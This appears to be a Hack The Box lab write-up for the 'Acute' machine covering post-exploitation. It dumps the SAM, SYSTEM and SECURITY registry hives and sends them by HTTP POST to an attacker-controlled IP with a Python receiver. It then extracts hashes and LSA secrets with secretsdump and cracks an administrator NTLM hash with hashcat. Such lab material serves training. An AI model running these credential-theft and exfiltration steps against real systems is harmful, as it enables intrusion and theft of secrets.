System Compromise
Lateral movement was made to the Acute-PC01 host as the jmorgan host earlier
PS C:\Users\jmorgan\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
acute\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.Checking the user privileges indeed confirms that the jmorgan user a local administrator
PS C:\Users\jmorgan\Documents> cmd /c reg save hklm\sam SAM
cmd /c reg save hklm\sam SAM
The operation completed successfully.
PS C:\Users\jmorgan\Documents> cmd /c reg save hklm\system SYSTEM
cmd /c reg save hklm\system SYSTEM
The operation completed successfully.
PS C:\Users\jmorgan\Documents> cmd /c reg save hklm\security SECURITY
cmd /c reg save hklm\security SECURITY
The operation completed successfully.At this point, the Acute-PC01 host is completely compromised
Hashdump
PS C:\Users\jmorgan\Documents> Compress-Archive -Path .\* -DestinationPath .\secret.zipArchiving secrets into the secret.zip file
PS C:\Users\jmorgan\Documents> iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile 'C:\Users\jmorgan\Documents\secret.zip'Sending the file over a HTTP post request
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ cat post.py
from http.server import BaseHTTPRequestHandler, HTTPServer
class MyRequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
content_length = int(self.headers['Content-Length'])
data = self.rfile.read(content_length)
with open('secret.zip', 'wb') as f:
f.write(data)
self.send_response(200)
httpd = HTTPServer(('0.0.0.0', 2222), MyRequestHandler)
httpd.serve_forever()
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ python3 post.py
10.10.11.145 - - [07/Nov/2023 21:22:18] "POST / HTTP/1.1" 200 -A local python web server will receive and save the file
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ unzip secret.zip
Archive: secret.zip
inflating: SAM
inflating: SECURITY
inflating: SYSTEMExtracting the secrets
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ impacket-secretsdump local -sam SAM -system SYSTEM -security SECURITY -outputfile acute-pc01
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x44397c32a634e3d8d8f64bff8c614af7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:f100a3ee4033082ed1a4d0df185f745021bba4dcf380666882e38cdac20c1fbd1eadc129d0f18c3fdbd4458ac66b7f9c24b78b0017ccc37a219b6bf192bc0f973d853b2cc3deb97daa0f456068f2dae317e4bb6dec0883a0721cdc4286c169e39dfa88afb057ffc4cac8cf641a5a037f35a8611e04bd8cfa9f6a604bff70ade3b1a027e210c4537cf92a90a94ab40631f51ffffaa920c4d3fe39d3a8807a57189f9d77c86ce5e96d2cd222654e14f85d4323d2401c7284a952a32299107bc88b16c049bd952e2cd1e471cb9d1c176c48473da971522346ea243c79b36e4627840d18c5f6f62e89e1b898ec7a7c79a98f
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:816f14efc1aef18b93f811509ea9a98e
[*] DPAPI_SYSTEM
dpapi_machinekey:0x574d0cc939c9f986cba32d1546a7fa28747425e0
dpapi_userkey:0x4a77ea6673a027ecd81e4ca010b1d3f70fe1d9cd
[*] NL$KM
0000 62 2A 29 8D F9 77 CC DD EE EB 23 20 B2 E2 AF 59 b*)..w....# ...Y
0010 0B F6 33 E0 95 5D B0 03 B1 01 85 55 9D 16 64 4D ..3..].....U..dM
0020 53 1F 93 7B FB EF 2B F7 6E 76 B1 02 3D 63 CC DF S..{..+.nv..=c..
0030 F0 35 6F E3 19 8A 69 C1 2E F6 78 80 45 51 EE 0A .5o...i...x.EQ..
NL$KM:622a298df977ccddeeeb2320b2e2af590bf633e0955db003b10185559d16644d531f937bfbef2bf76e76b1023d63ccdff0356fe3198a69c12ef678804551ee0a
[*] Cleaning up... Using impacket-secretsdump, I can dump the system hashes of the Acute-PC01 host
While this doesn’t include domain credentials, I try to crack these
Password Cracking
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ hashcat -a 0 -m 1000 acute-pc01.sam /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Hashes: 5 digests; 4 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
31d6cfe0d16ae931b73c59d7e0c089c0:
a29f7623fd11550def0192de9246f46b:Password@123
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: acute-pc01.sam
Time.Started.....: Tue Nov 7 21:28:06 2023 (3 secs)
Time.Estimated...: Tue Nov 7 21:28:09 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4962.2 kH/s (0.09ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 2/4 (50.00%) Digests (total), 2/4 (50.00%) Digests (new)
Progress.........: 14344386/14344386 (100.00%)
Rejected.........: 0/14344386 (0.00%)
Restore.Point....: 14344386/14344386 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2121736578796269746368] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 26%
Started: Tue Nov 7 21:27:53 2023
Stopped: Tue Nov 7 21:28:10 2023hashcat was able to crack a single NTLM hash
The cracked password is Password@123
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ grep -i a29f7623fd11550def0192de9246f46b acute-pc01.sam
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::While the cracked password belongs to the administrator user, I should test this password on the ATSSERVER host for password reuse